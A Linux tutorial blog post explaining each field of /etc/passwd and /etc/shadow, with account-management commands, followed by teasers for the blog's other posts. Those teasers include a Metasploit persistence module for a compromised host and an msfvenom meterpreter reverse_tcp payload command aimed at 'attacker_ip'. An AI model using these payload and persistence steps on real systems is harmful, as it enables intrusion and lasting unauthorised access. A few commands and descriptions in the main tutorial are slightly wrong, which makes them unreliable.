/etc/passwd file vs /etc/shadow file

-

                                               /etc/passwd vs /etc/shadow

Outcomes : 

You will have a decent understanding regarding the format of passwd and shadow file.

You will be able to customize your user accounts according to you needs.

-----------------------------------------------------------------------------------------------------------------------------

The passwd and shadow files stores the details of the existing users of the operating system and changes to the details on any user account reflects on that particular user account.firstly let's create a user named naruto using the adduser command  

Command 1:

sudo adduser naruto

Fig : 1.0


And you can see that we are prompted to assign a password and a home directory naruto is created . we are also prompted to enter the details like full name , room number and such things which I have skipped by hitting enter.

Now Let's see the user details in /etc/passwd file . 

Passwd file : 


Fig : 1.1


And in Fig:1.1 you could see a sentence starting with user naruto , but wait a minute what is this whole thing :

naruto : x : 1004 : 1004 : , , , : /home/naruto : /bin/bash 
      1      2     3         4        5            6                   7

1 : denotes the username

we can change the username Fig : 2.1 by using the command : 

syntax : 

sudo usermod -l NewUserName ExistingUserName

sudo usermod -l  hinata  naruto  

Fig : 1.2




2 : The character ‘x’ indicates that the hashed version of the password is available in /etc/shadow file which we will talk about later in this blog

3: This denotes the user id (every user on the system will be given a user id)

we can change the userid of the existing user naruto Fig : 1.3 using the command : 

syntax 

sudo usermod -u userid username 

sudo usermod -u 2000 naruto

Fig : 1.3




4:This denotes the group id (when we create a user , automatically a group is also created with the name of the user and the user account itself is added to the group)

we can change the group id of the group Fig : 1.3 using the command : 

syntax : 

sudo groupmod -g groupid groupname

sudo groupmod -g 2000 naruto

5: actually this represents the extra info like FullName, Room Number,Work Phone and the other details(also known as comments) that we haven’t filled previously , if filled they would be displayed.

6: It represents the home directory of the user

we can change the home directory of the user Fig : 1.4 using the command : 

syntax 

sudo usermod -m -d PathToTheDirectory username

sudo usermod -m -d /home/bob naruto

Fig : 1.4 



7:It represents the shell that is being used by the user account

we can change the shell of the user Fig : 1.5 using the command :

syntax 

sudo usermod --shell shell username  or sudo usermod -s shell username

sudo usermod --shell /bin/sh

Fig : 1.5




In a nutshell it something In the format like : 

naruto:x:1004:1004:,,,:/home/naruto:/bin/bash

[username]:[x]:[UID]:[GID]:[comment]:[home_directory]:[default_shell]


Shadow file : 

Fig : 1.6 


Let me breakdown into meaningfull pieces and elaborate it  Fig : 1.7

Fig : 1.7 



1) Nothing but username

2) This denotes the hashed password  , we have some signs Which helps in what  type of hash the password is.

Identification : 
$1$      -     MD5
$2a$    -     Blowfish
$2y$    -     Eksblowfish
$5$      -     SHA-256
$6$      -     SHA-512crypt
$y$      -     crypt

Here our hashed password starts with $6$ which means it uses SHA-512 algorithm .

well if you couldn't find yours , you could find it here . 

Before talking about the 3rd field we need to know about epoch time system which is also know as unix time system , this time system takes 1970 January 1st  00:00:00 UTC as reference and calculates the number of seconds then on . To view present date in epoch time Fig : 1.8

Command : 

expr $( date +%s )

Fig : 1.8




Which means 1654154766 seconds are completed till now from 1970 1st January , you can divide it with 86400 seconds (24 hours) to get the difference between the number of days from 1970 1st January till this day Fig : 1.9

Fig : 1.9



So 19145 days from 1970 1st Jan is today and this is called as epoch value 

To know the current date using epoch value Fig : 2.0 

Command : 

date -d "1970-01-01 19144 days“

Fig : 2.0


    You can see the current date in the above Fig : 2.0

3) 19144 is the epoch value and This denotes the when we have last changed the password in other words the most recent day we change the password for the account Fig : 2.1

Fig : 2.1


As you can see in the above Fig : 2.1 after changing the password the epoch value changed respectively

4)Minimum Password age , This denotes the minimum number of days required to be completed to change the password again in our case the value is zero which means we can password whenever we want to . For example if you the value is set to 2 days , we need to wait for 2 days to change the password . 


5) Maximum Password age , This denotes the maximum number of days we can use the password and after our password is expired and we are forced to change the password , in our case it’s 99999 which means our password will not expire for many many years

6) Warning Period , This denotes before how many number of days the user should get an alert about the password expiry in our case it is set to 7 

Well let’s see an example regarding all these shall we !!

Fig : 2.2



Fig : 2.3


In Fig : 2.2 the min password age is set to 0 , max is set to 99999 and warning is set to 7 which means we can change the password whenever we wanted to , our account will never expire for many many years and we will be getting an alert from 7 days before the password expiry

In Fig : 2.3 here’s where things get interesting

Command

sudo passwd –x 10 –n 2 –w 11 naruto

-x  : denotes max password age

-n : denotes min password age

-w : denotes warning period

And you can see we couldn’t change the password immediately coz min password age is set to 2 days and you can see the  warning as well coz we said to show 11 days before the expiration and there are only 10 days left for the account to expire which means every single day for 10 days till the password of your account expires you will get the alert message and after you are forced to change the password

7) This denotes the Inactive period . in our case it’s empty , for an instancd if it is set to 10 then10 days of not logging in after the password expiration of the account will disable your account. 

we could set the expiration date Fig : 2.4 using the command : 

syntax : 

 sudo passwd -i NumberInactiveDays username

sudo passwd -i 10 naruto  


Fig : 2.4


8)This denotes the expiration date of the account using the epoch value in our case it is empty .

we can set an expiration for an account  Fig : 2.4  using the command : 

syntax : 

sudo chage -E "ExpirationDate" username

sudo chage -E "2022-08-16" naruto


9) And This position is reserved for future use

Extra tip : 

You can see an exclamation mark at the start of the hashed password which indicates that the account is disabled or locked, even if you enter the right credentials it is return authentication failure onto the screen , the only way of accessing the account is by enabling it  Fig  : 2.5

Fig : 2.5



we can disable and enable any accout using the passwd command : 

To disable or lock any account : 

sudo passwd -l username

To enable or unlock any account :

sudo passwd -u username

                                    Thank You

                                                          


Comments

Post a Comment

Popular posts from this blog

Learning Nmap Host Discovery with iptables and Wireshark Analysis

-
Image
Learning Nmap Host Discovery with Iptables  and Wireshark Analysis Finally the wait is no longer , we are going to learn host discovery using nmap in a very detailed way. Well you might say that there are many videos and blogs out there what is special about this one ? , In this blog I will be sharing my knowledge after going through several videos , nmap book and many other blogs in the most detailed way possible , well you will see the difference after going through the blog . When I say I really mean it . Heads up !! you must know basis of iptables before going through the blog  and you might ask why ? coz we not just learning just by saying that nmap blocks the packets so this host discovery isn't going to work.  we are going to block the packets and run the discovery again and bypass the our rules ourselves that how this blog is designed very thing is practical practical and practical . How cool is that ?!. well I wrote blog on iptables just for you !! click here an...
Read more

Persistence Techniques with Metasploit - Part 6

-
Image
     Persistence Techniques with Metasploit Getting a shell in real world requries a lot of hardwork and research , All this work put in so that we will be ok to loose the session when the user logs off or turns the computer off ? Hell no ! , we need to make our connection persistance so that we can get back alive when the computer's on or when the user logs in. And we will be taking a look into the post module section which helps us to make our connection persistence after exploiting the target machine. Note : For creating a persistence backdoor you should have already compromised the target machine and have the meterpreter shell  Pov : you have already exploited the target machine and had a meterpreter shell Commands :  use exploit/windows/local/persistence_exe show options Fig : 1.1 In Fig : 1.1 we can see the different options availabe REXENAME option defines the name of the exe file the module is going to put on the remote system REXEPATH denotes the local ...
Read more

Generating Payloads using Msfvenom - Metasploit Part 5

-
Image
Generating and encoding Payloads using  Msfvenom Well aparantely msfvenom is a seperate tool from msfconsole which is used to generate payloads but it doesn't mean that we cannot create payloads using msfconsole but the advantage of using msfvenom is that there is no need for us to be in the msfconsole to generate payloads but no worries we will be covering both the methods :) So let's hop onto it shall we ! Command : msfvenom --list Fig : 1.1 In Fig : 1.1 we can see using the command we can list a brief instructions on how to use different options with it To list different types of modules we can use Command : msfvenom --list [modules] eg:payloads Fig : 1.2 In Fig : 1.2 we can see the different types of available payloads we can use with msfvenom and obviously it is going to take a while when you execute the command to load loads of payloads Let's create a meterpreter staged payload Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port_number -...
Read more